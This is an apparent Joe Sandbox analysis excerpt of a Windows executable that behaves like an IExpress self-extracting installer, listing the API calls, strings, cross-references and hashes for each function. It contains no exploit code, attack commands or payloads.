SHOWWINDOW, xrefs: 00FC3C34
ADMQCMD, xrefs: 00FC3C9E
smo, xrefs: 00FC3E68
USRQCMD, xrefs: 00FC3CAD
REBOOT, xrefs: 00FC3BE2
advpack.dll, xrefs: 00FC3F9D

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$smo
API String ID: 1032054927-2222961441
Opcode ID: 5831bc36cfe444fdbced61f371e5a267d4ffcbc7dd21be09c9424c6c050e6cfb
Instruction ID: a2102fdc6a6875c4d96b36ae46ed63ab2682dc2731e20ac61d3b889d7f34da60
Opcode Fuzzy Hash: 5831bc36cfe444fdbced61f371e5a267d4ffcbc7dd21be09c9424c6c050e6cfb
Instruction Fuzzy Hash: 6AB1EF7090830B9BD324DF248B47F6B76E4AB857A4F10892DFA86D3191DB74D904FB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00FC1BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00FC1BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00FC1C57
GetPrivateProfileIntA.KERNEL32(?,Reboot,00000000,?), ref: 00FC1C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00FC1140,00000000,00000008,?), ref: 00FC1CB8
GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00FC1D1B

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00FC4554

Strings

rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00FC1D3B
Command.com /c %s, xrefs: 00FC1D9B, 00FC1DE8
setupx.dll, xrefs: 00FC1D14
DefaultInstall, xrefs: 00FC1C74, 00FC1C87, 00FC1CCE, 00FC1CD3, 00FC1D2D, 00FC1D39
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00FC1BA0
Version, xrefs: 00FC1CB3
Reboot, xrefs: 00FC1C82
.INF, xrefs: 00FC1BDB
.BAT, xrefs: 00FC1D83
", xrefs: 00FC1B25
AdvancedINF, xrefs: 00FC1CAE
setupapi.dll, xrefs: 00FC1D23, 00FC1D3A

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-2280873615
Opcode ID: cb899cfcbc81bb161e2ed781aec5ac5ef19f44dd6c4f91fb3abf2764a1f971ff
Instruction ID: 2a072d79fd1398c6b1a1208379e3c532ba20c7d7d5dacbf3055c891daef83ecf
Opcode Fuzzy Hash: cb899cfcbc81bb161e2ed781aec5ac5ef19f44dd6c4f91fb3abf2764a1f971ff
Instruction Fuzzy Hash: 22A14F70D0021A5BEB209B24CE47FE67769BB43320F14429CE555E32C3DB749DA9EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00FC59A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 00FC59AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00FC5A13
MulDiv.KERNEL32(?,?,00000400), ref: 00FC5A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00FC5A64
memset.MSVCRT ref: 00FC5A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00FC5A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00FC5AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00FC5BFC

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00FC4554

Part of subcall function 00FC6285: GetLastError.KERNEL32(00FC5BBC), ref: 00FC6285

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: 1ed762fe2c249f693d51d965307ad3c911fa846c8894988e0b61d0b8762847bc
Instruction ID: 71efeb789d6d8e324538673fe831a14954b12c509f5f2c7ba34cb46f1f2ba164
Opcode Fuzzy Hash: 1ed762fe2c249f693d51d965307ad3c911fa846c8894988e0b61d0b8762847bc
Instruction Fuzzy Hash: 0271A3B190061DAFDB15DB60CE8BFFA77ACEB88754F1440ADF405D7140DA74AE85AB20

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
Part of subcall function 00FC468F: SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
Part of subcall function 00FC468F: LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
Part of subcall function 00FC468F: LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
Part of subcall function 00FC468F: memcpy_s.MSVCRT ref: 00FC46E5
Part of subcall function 00FC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00FC4FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00FC5006
LockResource.KERNEL32(00000000), ref: 00FC500D
GetDlgItem.USER32(00000000,00000842), ref: 00FC5030
ShowWindow.USER32(00000000), ref: 00FC5037
GetDlgItem.USER32(00000841,00000005), ref: 00FC504A
ShowWindow.USER32(00000000), ref: 00FC5051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00FC5111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00FC5159

Strings

*MEMCAB, xrefs: 00FC50C7
CABINET, xrefs: 00FC4FE6, 00FC4FF7

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 33669677be42b338bf4248f678763aa0a5b4b2d2f83cdbed43cd739b612d59ad
Instruction ID: 8f6736b47fde300139ee4418abc486197dc068949f0beebbb4942837f4056747
Opcode Fuzzy Hash: 33669677be42b338bf4248f678763aa0a5b4b2d2f83cdbed43cd739b612d59ad
Instruction Fuzzy Hash: FC31A6B1A8061F6FD7105B61AF9FF67365CA744BA9F08001CB901931A1DAA9FC40B651

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000105), ref: 00FC2F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00FC2FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00FC2FC6
DecryptFileA.ADVAPI32 ref: 00FC2FE6
FreeLibrary.KERNEL32(00000000), ref: 00FC2FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00FC301C

Part of subcall function 00FC51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00FC2F4D,?,00000002,00000000), ref: 00FC5201

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00FC2FDB, 00FC3017
advapi32.dll, xrefs: 00FC2F99
DecryptFileA, xrefs: 00FC2FC0

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-1173327654
Opcode ID: 6665ff0236c01a38115d34fe7f2f049fb09163dd4d166a7c5f7a5bb50244d5d3
Instruction ID: d003c8278a3c3a33db05553584631f0b9ebf12965aafed728a3cc7c04594ec93
Opcode Fuzzy Hash: 6665ff0236c01a38115d34fe7f2f049fb09163dd4d166a7c5f7a5bb50244d5d3
Instruction Fuzzy Hash: 9641B932E4021F9ADB30AB719F4BF5633A8EB447E8F04406DA941C3192EB78DE81F651

Uniqueness

Uniqueness Score: -1.00%

Function 00FC5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC54C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC556F

Part of subcall function 00FC53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC53FB
Part of subcall function 00FC53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC5402
Part of subcall function 00FC53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC541F
Part of subcall function 00FC53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC542B
Part of subcall function 00FC53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC5434

Strings

i386, xrefs: 00FC54FE
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00FC547D, 00FC5481, 00FC54AB, 00FC551C, 00FC553C, 00FC5568
mips, xrefs: 00FC54F7
alpha, xrefs: 00FC54F0
ppc, xrefs: 00FC54E9

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-3374052426
Opcode ID: b7252e8f46265259f40d0fe5f2d99365d49c954f77caab7de7e3e9be78e406a0
Instruction ID: 16a3e707fb5115f5bffeb020810de0fc6e4d193775758022fee2dd0883388e2d
Opcode Fuzzy Hash: b7252e8f46265259f40d0fe5f2d99365d49c954f77caab7de7e3e9be78e406a0
Instruction Fuzzy Hash: AD314C71F00A0B5BCB109B259F47F7E779BBB81B58B0C052EA401D3141DB78EE89B681

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE(?,00FC8A3A,00FC11F4,00FC8A3A,00000000,?,?), ref: 00FC23F6
lstrcmpA.KERNEL32(?,00FC11F8), ref: 00FC2427
lstrcmpA.KERNEL32(?,00FC11FC), ref: 00FC243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00FC2495
DeleteFileA.KERNEL32(?), ref: 00FC24A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 00FC24AF
FindClose.KERNELBASE(00000000), ref: 00FC24BE
RemoveDirectoryA.KERNELBASE(00FC8A3A), ref: 00FC24C5

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 451b1f8cdf6bf44e22c123f75dea1a5395316d9bd52acefda2b550a379b3ea43
Instruction ID: 29e44ada0c5e84d54cde495916d07ba5fdcca7f19bb73de6a64c0979dfa27012
Opcode Fuzzy Hash: 451b1f8cdf6bf44e22c123f75dea1a5395316d9bd52acefda2b550a379b3ea43
Instruction Fuzzy Hash: E931D4326046499BC320DB64CE4BFEB73ACFBC5315F04492DB55583191EB38A80DE752

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00FC4033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FC4049
GetExitCodeProcess.KERNELBASE(?,?), ref: 00FC405C
CloseHandle.KERNEL32(?), ref: 00FC409C
CloseHandle.KERNEL32(?), ref: 00FC40A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00FC40DC
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00FC40E9

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: 509827576760b2fbb7d72c19c9af9885b0376f81f7f9572773c5fc2e5fd50191
Instruction ID: 4f58767b28ed5b20b2aa018021edcb83ef59fc0d8a891fe2b9aac3f1d1baa361
Opcode Fuzzy Hash: 509827576760b2fbb7d72c19c9af9885b0376f81f7f9572773c5fc2e5fd50191
Instruction Fuzzy Hash: 6531D131A8020CABEB209B25DE4FFAB7778EB94714F1001ADF945D2161CA346C85EF11

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00FC6BB0,00FC0000,00000000,00000002,0000000A), ref: 00FC2C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00FC6BB0,00FC0000,00000000,00000002,0000000A), ref: 00FC2C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00FC2C28
CloseHandle.KERNEL32(00000000,?,?,00FC6BB0,00FC0000,00000000,00000002,0000000A), ref: 00FC2C98

Strings

Kernel32.dll, xrefs: 00FC2C13
HeapSetInformation, xrefs: 00FC2C22

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 8b4f08eb0e3fdc249cf0701a7618e859735d1955762ee54d33bd88c6716c65f6
Instruction ID: 10a472875669bc62ff9ca06ff5e113136c99a2710a2ee23f9ebf1a26b7d2040b
Opcode Fuzzy Hash: 8b4f08eb0e3fdc249cf0701a7618e859735d1955762ee54d33bd88c6716c65f6
Instruction Fuzzy Hash: 8911E071A0020F6BC760ABB5AF8BF6E3759EB843B4B08002DB801D7251CE35EC05B661

Uniqueness

Uniqueness Score: -1.00%

Function 00FC55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
Part of subcall function 00FC468F: SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
Part of subcall function 00FC468F: LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
Part of subcall function 00FC468F: LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
Part of subcall function 00FC468F: memcpy_s.MSVCRT ref: 00FC46E5
Part of subcall function 00FC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00FC55CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00FC5638
LocalFree.KERNEL32(00000000), ref: 00FC564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00FC5620

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00FC4554

Part of subcall function 00FC6285: GetLastError.KERNEL32(00FC5BBC), ref: 00FC6285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00FC56B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00FC571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00FC5737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00FC57CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00FC57EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00FC5802

Part of subcall function 00FC2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00FC2654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00FC5830

Part of subcall function 00FC6517: FindResourceA.KERNEL32(00FC0000,000007D6,00000005), ref: 00FC652A
Part of subcall function 00FC6517: LoadResource.KERNEL32(00FC0000,00000000,?,?,00FC2EE8,00000000,00FC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00FC6538
Part of subcall function 00FC6517: DialogBoxIndirectParamA.USER32(00FC0000,00000000,00000547,00FC19E0,00000000), ref: 00FC6557
Part of subcall function 00FC6517: FreeResource.KERNEL32(00000000,?,?,00FC2EE8,00000000,00FC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00FC6560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00FC5878

Part of subcall function 00FC597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00FC59A8
Part of subcall function 00FC597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00FC59AF

Strings

msdownld.tmp, xrefs: 00FC57D3
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00FC56AE, 00FC56B3, 00FC583D
RUNPROGRAM, xrefs: 00FC55BD, 00FC5600
<None>, xrefs: 00FC5632
Z, xrefs: 00FC570A
A:\, xrefs: 00FC56F4

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-2740620654
Opcode ID: 83a2414c613b17e87011c59d8a8da1eb4f212da7e034fd964e46de9d43143bf5
Instruction ID: c50dc740ee542360fbdf1a05f05ac63c8a4b692126e61882112c81a7145764c3
Opcode Fuzzy Hash: 83a2414c613b17e87011c59d8a8da1eb4f212da7e034fd964e46de9d43143bf5
Instruction Fuzzy Hash: 4F811671E04A0F9ADB249B308F87FEA726D9F51B54F04006DF586D3191DE74ADC1BA11

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00FC2CD9
memset.MSVCRT ref: 00FC2CE9
memset.MSVCRT ref: 00FC2CF9

Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
Part of subcall function 00FC468F: SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
Part of subcall function 00FC468F: LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
Part of subcall function 00FC468F: LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
Part of subcall function 00FC468F: memcpy_s.MSVCRT ref: 00FC46E5
Part of subcall function 00FC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC2D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC2D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC2DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00FC2DBD
CloseHandle.KERNEL32(smo,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC2E0A

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00FC4554

Strings

INSTANCECHECK, xrefs: 00FC2D95
VERCHECK, xrefs: 00FC2E54
smo, xrefs: 00FC2D04, 00FC2DD9, 00FC2DF0
